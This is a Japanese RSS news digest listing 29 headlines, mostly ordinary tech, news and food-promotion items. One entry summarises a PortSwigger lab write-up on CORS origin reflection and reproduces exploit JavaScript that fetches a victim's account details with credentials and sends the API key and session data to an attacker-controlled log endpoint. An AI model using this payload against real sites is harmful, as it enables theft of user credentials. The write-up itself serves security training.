投稿時間:2022-12-08 13:24:15 RSSフィード2022-12-08 13:00 分まとめ(29件)

カテゴリー等	サイト名等	記事タイトル・トレンドワード等	リンクURL	頻出ワード・要約等/検索ボリューム	登録日
ROBOT	ロボスタ	『太陽光発電設備＋蓄電池』で災害に強いスマートバス停を実現できるか 新潟県見附駅前・見附高校前で実証実験	https://robotstart.info/2022/12/08/smart-bus-niigata-mitsuke.html		2022-12-08 03:32:58
IT	ITmedia 総合記事一覧	[ITmedia News] 「AIの遺電子」アニメ化　元IT記者が描く「AIヒューマノイドと共に生きる近未来」	https://www.itmedia.co.jp/news/articles/2212/08/news109.html	itmedia	2022-12-08 12:51:00
IT	ITmedia 総合記事一覧	[ITmedia ビジネスオンライン] 人手不足でホテルや旅館が悲鳴！　「稼ぎ時なのに」予約や夕食中止に	https://www.itmedia.co.jp/business/articles/2212/08/news108.html	itmedia	2022-12-08 12:46:00
IT	ITmedia 総合記事一覧	[ITmedia News] Microsoft、ゲーム開発向け支援を拡充　Azureクレジットや法人向けMicrosoft 365を追加で提供　スタートアップ対象	https://www.itmedia.co.jp/news/articles/2212/08/news107.html	ITmediaNewsMicrosoft、ゲーム開発向け支援を拡充Azureクレジットや法人向けMicrosoftを追加で提供スタートアップ対象米Microsoftがゲーム開発者向けの支援プログラム「IDAzure」を拡充。	2022-12-08 12:45:00
IT	ITmedia 総合記事一覧	[ITmedia News] 突如終了で批判受けた家族SNS「ウェルノート」、一括ダウンロード提供へ　「みてね」移行も	https://www.itmedia.co.jp/news/articles/2212/08/news105.html	itmedia	2022-12-08 12:30:00
IT	ITmedia 総合記事一覧	[ITmedia ビジネスオンライン] 味やラベルを自由にカスタマイズ　サントリーのコーヒーサービス、関西に初出店　特徴は？	https://www.itmedia.co.jp/business/articles/2212/08/news099.html	itmedia	2022-12-08 12:20:00
IT	ITmedia 総合記事一覧	[ITmedia PC USER] ダイヤテック、Bluetooth＋USB接続対応メカニカルキーボード「Majestouch Convertible」新モデル　Bluetooth 5.1に対応	https://www.itmedia.co.jp/pcuser/articles/2212/08/news103.html	bluetooth	2022-12-08 12:20:00
TECH	Techable（テッカブル）	コストも人権意識も「外部化」をやめよ。なぜ今「ビジネスと人権」なのか	https://techable.jp/archives/187109	論理	2022-12-08 03:00:32
js	JavaScriptタグが付けられた新着投稿 - Qiita	TypeScript文法(基礎編) プリミティブ型、基本的な型の種類について	https://qiita.com/reisuta/items/702b64d50bbbe6bdf36d	typescript	2022-12-08 12:08:28
js	JavaScriptタグが付けられた新着投稿 - Qiita	Nuxt/Vueで多階層(入れ子)に対応したアコーディオンを実装する	https://qiita.com/_neko/items/bc3aaeaaad6b31c61c66	httpszenn	2022-12-08 12:05:50
Linux	Ubuntuタグが付けられた新着投稿 - Qiita	UbuntuにAWSIM（自動運転シミュレータ）をインストールする	https://qiita.com/Yujisuper/items/b53a29e2e5949a3a24c7	awsim	2022-12-08 12:52:46
Linux	Ubuntuタグが付けられた新着投稿 - Qiita	Kubernetesクラスターを構成しているubuntu 20.04のネットワークトラフィックをMRTGでグラフにする	https://qiita.com/YasuhiroABE/items/7947691d028d5483cf75	iplinkw	2022-12-08 12:52:33
golang	Goタグが付けられた新着投稿 - Qiita	Go言語でスライスから特定の要素を削除する方法	https://qiita.com/isaka1022/items/6dbfa41300f3e47fcc21	append	2022-12-08 12:16:45
技術ブログ	Developers.IO	[レポート] Amazon Lookout for Equipmentでヘルスケアの異常検知を実現するBreakout Sessionを聴講しました！ #reinvent #COM303	https://dev.classmethod.jp/articles/reinvent2022-session-com303-monitor-health-using-lookout-equipment/	monitorandpred	2022-12-08 03:58:49
技術ブログ	Developers.IO	Amazon QuickSight สามารถเขียนโค้ดสร้าง Dashboards, Analyzes และ Templates ได้แล้ว!!! #reInvent	https://dev.classmethod.jp/articles/quicksight-can-code-to-create-dashboards-analyzes-and-templates/	Amazon QuickSight สามารถเขียนโค้ดสร้างDashboards Analyzes และTemplates ได้แล้ว reInventล่าสุดQuickSight ได้มีการอัพเดทใหญ่เกิดขึ้นจากบทความด้านล่างนี้Expanded API capabilities now generally avail	2022-12-08 03:56:28
海外TECH	DEV Community	Portswigger’s lab write up: CORS vulnerability with basic origin reflection	https://dev.to/christianpaez/portswiggers-lab-write-up-cors-vulnerability-with-basic-origin-reflection-2359	Portswigger s lab write up CORS vulnerability with basic origin reflectionIn this apprentice level lab we will exploit a website with a basic CORS vulnerability to obtain a user s private credentials Upon logging in with the given credentials we visit the account details page and check the response headers of the request to accountDetails that fetches the user s API key HTTP OKAccess Control Allow Credentials trueContent Type application json charset utf Connection closeContent Length username wiener email apikey JQufLKKzNoIahWKAKWBGePwgwJW sessions cdmflpOOpsYIpnovWUytbSDMiX We can see that the Access Control Allow Credentials true is present let s try to duplicate this request and change the Origin header to something like Origin and see if this value is reflected the resulting response will be something like this HTTP OKAccess Control Allow Origin lt gt Access Control Allow Credentials trueContent Type application json charset utf Connection closeContent Length username wiener email apikey JQufLKKzNoIahWKAKWBGePwgwJW sessions cdmflpOOpsYIpnovWUytbSDMiX The Origin set in the request headers is present in the Access Control Allow Origin response headers this confirms us that this request has a CORS vulnerability let s use the reading material s template to craft our exploit var req new XMLHttpRequest req onload reqListener req open get lt true req withCredentials true req send function reqListener location malicious website com log key encodeURIComponent this responseText We have to modify out exploit to include the vulnerable website s accountDetails endpoint and our exploit server log endpoint after including the code in a lt script gt tag the final exploit will look like this lt script gt var req new XMLHttpRequest req onload reqListener req open get LAB URL accountDetails true req withCredentials true req send function reqListener location EXPLOIT SERVER URL log key encodeURIComponent this responseText lt script gt After sending this exploit to our victim we can read their credentials in our exploit server logs GET log key B A username A wiener C A email A C A apikey A OiwIQxcRilUvyyaitSWuUnzjfrzp C A sessions A B A QJkdqEvVtNcHmZixScfFPDENAzvo C A JNIcVJZlskPdwjcfCfAREYXnaNATt A D A D HTTP User Agent Mozilla Windows NT Win x AppleWebKit KHTML like Gecko Chrome Safari Check out this write up on the Art Of Code Github	2022-12-08 03:29:08
医療系	医療介護 CBnews	病床使用率が上昇傾向、医療機関の集団感染も-厚労省がコロナアドバイザリーボードの分析公表	https://www.cbnews.jp/news/entry/20221208122826	上昇傾向	2022-12-08 12:45:00
医療系	医療介護 CBnews	うつ病患者にVR、認知行動療法の臨床研究実施-国立精神・神経医療研究センター病院	https://www.cbnews.jp/news/entry/20221207195052	国立研究開発法人国立精神	2022-12-08 12:10:00
海外ニュース	Japan Times latest articles	Japan’s smaller contraction masks extent of underlying weakness	https://www.japantimes.co.jp/news/2022/12/08/business/economy-business/japan-economy-smaller-hit/	Japan s smaller contraction masks extent of underlying weaknessGross domestic product shrank an annualized in the three months to the end of September from the previous period revised figures from the Cabinet	2022-12-08 12:32:19
海外ニュース	Japan Times latest articles	Japan to describe China military moves as ‘challenge’ to international order	https://www.japantimes.co.jp/news/2022/12/08/national/japan-document-china-challenge/	Japan to describe China military moves as challenge to international orderThe planned reference may provoke Beijing but the wording is softer than threat a term some Liberal Democratic Party lawmakers have backed	2022-12-08 12:15:29
ニュース	BBC News - Home	Umar Patek: Anger and fear in Australia as Bali bomber freed	https://www.bbc.co.uk/news/world-australia-63883431?at_medium=RSS&at_campaign=KARANGA	patek	2022-12-08 03:15:52
ニュース	BBC News - Home	Why this Trump loyalist is willing to serve months in Rikers prison	https://www.bbc.co.uk/news/world-us-canada-63893268?at_medium=RSS&at_campaign=KARANGA	crimes	2022-12-08 03:01:32
ビジネス	ダイヤモンド・オンライン - 新着記事	TSMCの米半導体工場、後ろ盾は盤石 - WSJ発	https://diamond.jp/articles/-/314207	盤石	2022-12-08 12:22:00
ニュース	Newsweek	「女子にも権利がある」──11歳で結婚した私が教育を諦めない理由	https://www.newsweekjapan.jp/stories/lifestyle/2022/12/11-81.php	夫は最初はかたくなだったけど、叔父が私の教育を続けるべきだと家族を説得してくれたことは、とても幸運だった。	2022-12-08 12:10:00
ニュース	Newsweek	ロシア動員兵の間で事故死や変死相次ぐ	https://www.newsweekjapan.jp/stories/world/2022/12/post-100296.php	ウクライナの情報機関であるウクライナ保安庁SBUは月日、ロシア軍の通信を傍受した結果として、ロシア軍司令部が召集兵の死因を隠していることが判明したと発表した。	2022-12-08 12:07:30
IT	週刊アスキー	クリスマスや年末の食卓には「ほっともっと」のチキンバスケット！ 「WinterチキンBOXキャンペーン」実施中	https://weekly.ascii.jp/elem/000/004/116/4116567/	winter	2022-12-08 12:30:00
IT	週刊アスキー	15年ぶりの復活「海鮮豆腐キムチチゲ」も登場！ 松屋より寒い日にぴったりのピリ辛「牛豆腐キムチチゲ」	https://weekly.ascii.jp/elem/000/004/116/4116568/	豆腐	2022-12-08 12:20:00
IT	週刊アスキー	バーガーキング「ワッパー チーズ“ウィンター・アラビアータ”」トマトホットソースの辛さとゴーダチーズの舌触りが魅力！	https://weekly.ascii.jp/elem/000/004/116/4116562/	期間限定	2022-12-08 12:15:00
IT	週刊アスキー	1人だけのクリスマスナイトのお供……ロッテリア「Xmas クリぼっちキンパック」12月15日～12月25日発売	https://weekly.ascii.jp/elem/000/004/116/4116552/	期間限定	2022-12-08 12:10:00